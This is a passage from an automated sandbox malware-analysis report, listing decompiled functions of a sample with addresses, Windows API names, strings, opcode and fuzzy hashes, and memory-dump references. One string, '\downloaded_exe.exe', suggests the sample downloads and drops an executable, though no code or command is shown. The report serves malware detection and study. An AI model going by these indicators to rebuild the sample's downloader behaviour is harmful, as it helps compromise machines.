                                                        • Instruction Fuzzy Hash: 21917233B0CB0286E750AF26E9402AABBA8EF45794F844131DE9D83795DFBCE445C724
                                                        Function 00007FF70203B4D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID: basic_string::_M_create
                                                        • API String ID: 2882836952-3122258987
                                                        • Opcode ID: 81394b7973024bfa36102f207e3d1beb8cf2c8169726a5bdc2a7960428d344df
                                                        • Instruction ID: ea76e59444bdd3f1fdbfcd5e2c2195cf7081d1f38bb7b8761658d283cf76129e
                                                        • Opcode Fuzzy Hash: 81394b7973024bfa36102f207e3d1beb8cf2c8169726a5bdc2a7960428d344df
                                                        • Instruction Fuzzy Hash: 81314333B0D30646FB556B259E01779BA98AF5075DF988034CA0D8A684EFBCD881C275
                                                        Function 00007FF70203D0E0 Relevance: 10.6, APIs: 7, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastmemsetrealloc$AllocValue
                                                        • String ID:
                                                        • API String ID: 2127548929-0
                                                        • Opcode ID: 3c7d1c8ddbe6335250238323250973b2b5a55263e069b4f990abec70751075a0
                                                        • Instruction ID: ce4be225715852eb06706fbda2069acb5d06c6b1538fa12beba2f822821623fd
                                                        • Opcode Fuzzy Hash: 3c7d1c8ddbe6335250238323250973b2b5a55263e069b4f990abec70751075a0
                                                        • Instruction Fuzzy Hash: EA218123B0974652EA05BF29AD415ADAB96BF48B98FC40830DD0D47395EFBCE885C364
                                                        Function 00007FF70203D370 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleValue$_endthreadexlongjmp
                                                        • String ID:
                                                        • API String ID: 3990644698-0
                                                        • Opcode ID: 372cc3de297aeb31128c120e520bff019487bff179158b0ba46dfdb4389201ef
                                                        • Instruction ID: b7e8dfbe2adfc0d5d821be238192d060873b0fe302a9bb3e3f91dde0ea38e471
                                                        • Opcode Fuzzy Hash: 372cc3de297aeb31128c120e520bff019487bff179158b0ba46dfdb4389201ef
                                                        • Instruction Fuzzy Hash: D7214C63A0D74286FB19AF21ED50338ABA8EF88B18F854035CA0D47794DFBCA845C324
                                                        Function 00007FF70203ED50 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: exitfprintf
                                                        • String ID: ($(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)$../mingw-w64/mingw-w64-libraries/winpthreads/src/rwlock.c$Assertion failed: (%s), file %s, line %d
                                                        • API String ID: 4243785698-2396019738
                                                        • Opcode ID: 3249d49b2a7d2f08c1650fdaf9ac24025e3e48d972a6374a6f332bd8cd4acaa7
                                                        • Instruction ID: 0f34135b96848e72cc74edb47a18cb9f4019dc5b8842353056b633d2064cebb3
                                                        • Opcode Fuzzy Hash: 3249d49b2a7d2f08c1650fdaf9ac24025e3e48d972a6374a6f332bd8cd4acaa7
                                                        • Instruction Fuzzy Hash: 22119027B0874986EB50FB29D9612B8BB64FF44B48FC48531DA0D47391CFACD445C764
                                                        Function 00007FF702039F90 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 45threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: CurrentThreadfprintf
                                                        • String ID: C%p %lu %s$C%p %lu V=%0X w=%ld %s
                                                        • API String ID: 1384477639-1941858864
                                                        • Opcode ID: 38d947f7e95cc686aeb1ed60ec567d82478e6484f9d76f55a8b99063fe4ca265
                                                        • Instruction ID: 2478ff3f2c01d1e7c76d2eed419c652f047e8d8e47e767f0343f3ebdea3d7690
                                                        • Opcode Fuzzy Hash: 38d947f7e95cc686aeb1ed60ec567d82478e6484f9d76f55a8b99063fe4ca265
                                                        • Instruction Fuzzy Hash: 52014477B4974589EA61AB25FC40468BF64BF88BE4B848132DD4C83714DF7CE445C715
                                                        Function 00007FF70203EB90 Relevance: 10.5, APIs: 7, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCurrentHandleOpen_errno
                                                        • String ID:
                                                        • API String ID: 2250453136-0
                                                        • Opcode ID: 59e0a43ac7f34221b530820eeaedbf2249590ab3a7c65e4ed0472d50cbba6f9f
                                                        • Instruction ID: 4afba08c399dccde6cf54c3808fa083b362e8727d239fdaeaccdd2021946c6ae
                                                        • Opcode Fuzzy Hash: 59e0a43ac7f34221b530820eeaedbf2249590ab3a7c65e4ed0472d50cbba6f9f
                                                        • Instruction Fuzzy Hash: A9014062B0D71282FA573B54FD842B9A9B8AF44715FC44634D90F42391CFBC2885C234
                                                        Function 00007FF70203CAD0 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: Process$AffinityCurrentMask
                                                        • String ID:
                                                        • API String ID: 1231390398-0
                                                        • Opcode ID: 1f6344ac197d32388fda0e6e14e6abb4ceef7fc347dc4a150ac90798c837f84a
                                                        • Instruction ID: ef3dcadab9fd6d229a31cc6be2c9a7d0ae14fb404db30fb4829bc853022377fc
                                                        • Opcode Fuzzy Hash: 1f6344ac197d32388fda0e6e14e6abb4ceef7fc347dc4a150ac90798c837f84a
                                                        • Instruction Fuzzy Hash: 1A318F63B1DB4282FB506F65B8442BAABA1AF84794F884036EE4D93754DF7CD845C314
                                                        Function 00007FF70203C5B0 Relevance: 9.1, APIs: 6, Instructions: 97sleepthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: Value$AllocCloseCurrentHandleSleepThread_endthreadex
                                                        • String ID:
                                                        • API String ID: 3976303954-0
                                                        • Opcode ID: 61fe042bbeff7629d34622524149c552faa636ff620bc236fc40d6aaab71e3bf
                                                        • Instruction ID: 03bda4df2051a6aa00268819fd1419136416589f8614432f09df10f37d3ef271
                                                        • Opcode Fuzzy Hash: 61fe042bbeff7629d34622524149c552faa636ff620bc236fc40d6aaab71e3bf
                                                        • Instruction Fuzzy Hash: 6B411B26A0C74686EA04BF22DD501BDBB64FF84B58F850936D91E573A6DFBCE440C368
                                                        Function 00007FF70202FD80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_write
                                                        • String ID: *** buffer overflow detected ***: terminated
                                                        • API String ID: 483568592-381091186
                                                        • Opcode ID: ecb5f1847511f91aa88bcb3b5a20e47e37b3e6d4f73a9e46b643fd6841988ac2
                                                        • Instruction ID: 0034b5ae0ee866b1367ed22e4e9ecf692eefaaa673824742e6487a50199e515a
                                                        • Opcode Fuzzy Hash: ecb5f1847511f91aa88bcb3b5a20e47e37b3e6d4f73a9e46b643fd6841988ac2
                                                        • Instruction Fuzzy Hash: 18E0EC52B1D30286F6447B51FD193758962AF46B45F914035D60D463D2DFAC9805C364
                                                        Function 00007FF702033060 Relevance: 7.9, APIs: 5, Instructions: 393COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: fputc
                                                        • String ID:
                                                        • API String ID: 1992160199-0
                                                        • Opcode ID: 3167a9d32744581c390363e120c88932c07a154247f8715914f74fe608fa9931
                                                        • Instruction ID: 6846b2fa890b0589da2256689a64ca75167c5e34a3366671172fb333f59f3b15
                                                        • Opcode Fuzzy Hash: 3167a9d32744581c390363e120c88932c07a154247f8715914f74fe608fa9931
                                                        • Instruction Fuzzy Hash: E9E1F673E1C38146E7616F259A84739AE99BF10B68F948270CA1D577C4CBBCF841C7A8
                                                        Function 00007FF70202C690 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 318COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ?$]${default arg#$}::
                                                        • API String ID: 0-2946519879
                                                        • Opcode ID: 84a208b9b58c1390f5c5b94230dea3af1550641df20fe630cf83d2d133fe6c5d
                                                        • Instruction ID: 6ffe4e6373b2f310bc72f7523f8b1ee664850b6f9d569229c5df4a661aa6dfe4
                                                        • Opcode Fuzzy Hash: 84a208b9b58c1390f5c5b94230dea3af1550641df20fe630cf83d2d133fe6c5d
                                                        • Instruction Fuzzy Hash: CCE1813360878686E7259B25D8003EEBB95EF15B48F988033CB9907785DFBDE499C364
                                                        Function 00007FF702052790 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 200stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: memcpystrlenwcslen
                                                        • String ID: basic_string: construction from null is not valid
                                                        • API String ID: 339887217-2991274800
                                                        • Opcode ID: 5cb15de27b2b22e502292c74c85fd625f8cfecf8670d2e9c3aeec2af6be31ec2
                                                        • Instruction ID: ca79fa2feba0609686dda68d8065d3b28bd1c026b750ac8f081e1c0673d45ef3
                                                        • Opcode Fuzzy Hash: 5cb15de27b2b22e502292c74c85fd625f8cfecf8670d2e9c3aeec2af6be31ec2
                                                        • Instruction Fuzzy Hash: 49518F27A19B5684EE61AF5AEC400BEAB60FF48BD4B884532DE4C07B64DF7CE551C324
                                                        Function 00007FF70203B610 Relevance: 7.6, APIs: 5, Instructions: 115COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: Time$FileSystem
                                                        • String ID:
                                                        • API String ID: 2086374402-0
                                                        • Opcode ID: 01e5f63f07aa3bc012f2ea0a70e0574386688510a96441d94ca9f8959f86fd6c
                                                        • Instruction ID: 3cbb8289079e7e1babc311db005c26f72b0060abf1f60fcc3c2d36e2912581ee
                                                        • Opcode Fuzzy Hash: 01e5f63f07aa3bc012f2ea0a70e0574386688510a96441d94ca9f8959f86fd6c
                                                        • Instruction Fuzzy Hash: DA41A533B0D70686FF656A259E00779BA94AF40B5CF988135CA0D8A3D5EFBCD840C364
                                                        Function 00007FF7020231E5 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 108stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: strlen
                                                        • String ID: _$b$x
                                                        • API String ID: 39653677-3075772552
                                                        • Opcode ID: 5cedb7dfa5c02eb2b994283e8a3ab49f204d3eb8f1e0aff2239e86d04fdc70db
                                                        • Instruction ID: 47e1c08e9ca2c4fe7daac3d50a8ecba3a25a7e60caa167b19bb83d5a1c69d292
                                                        • Opcode Fuzzy Hash: 5cedb7dfa5c02eb2b994283e8a3ab49f204d3eb8f1e0aff2239e86d04fdc70db
                                                        • Instruction Fuzzy Hash: 1B41C2B3E09B0686EB64AF24DD81229B7A1FF14794F914032CA4C83745DFBCE4A5C764
                                                        Function 00007FF702039EA0 Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$Leave$EnterReleaseSemaphore
                                                        • String ID:
                                                        • API String ID: 2813224205-0
                                                        • Opcode ID: 382a2c40e298c0a943f4b9065882d68dae78f63921f1d63db1609860284ac8c2
                                                        • Instruction ID: e6e3245fa42bef620dfd064de03a9c38b38084e6b05f551912a6227fb438e8ae
                                                        • Opcode Fuzzy Hash: 382a2c40e298c0a943f4b9065882d68dae78f63921f1d63db1609860284ac8c2
                                                        • Instruction Fuzzy Hash: 66019623F0961586E7156F2ABE90278D6A5AF99BA6F884130CE0DC1380EE7C98C6C210
                                                        Function 00007FF702046380 Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: setlocale$memcpystrlen
                                                        • String ID:
                                                        • API String ID: 4096897932-0
                                                        • Opcode ID: 09c03c186ffd92fac6b37ae63abfe8b935f89c1b2c5af9c868b9c5306f4de6d5
                                                        • Instruction ID: dbfcea25109a6650c40143d5c218421654381e45a30e77162dfb643a64c46922
                                                        • Opcode Fuzzy Hash: 09c03c186ffd92fac6b37ae63abfe8b935f89c1b2c5af9c868b9c5306f4de6d5
                                                        • Instruction Fuzzy Hash: 83018443B0925A11EE69FA632D068FA8A456F4AFD4FC48035ED0D5B786DEBCE042C318
                                                        Function 00007FF70203A570 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(00000086,000000AE,?,00007FF70211C190,00007FF70203AD51), ref: 00007FF70203A596
                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF70211C190), ref: 00007FF70203A5BB
                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF70211C190), ref: 00007FF70203A5EB
                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF70211C190), ref: 00007FF70203A5F5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave
                                                        • String ID: \downloaded_exe.exe
                                                        • API String ID: 3168844106-1839852069
                                                        • Opcode ID: dd278a7fd6d6c57ce7ff34922fc15c7e4d8852c79c5206768016da5021ba02df
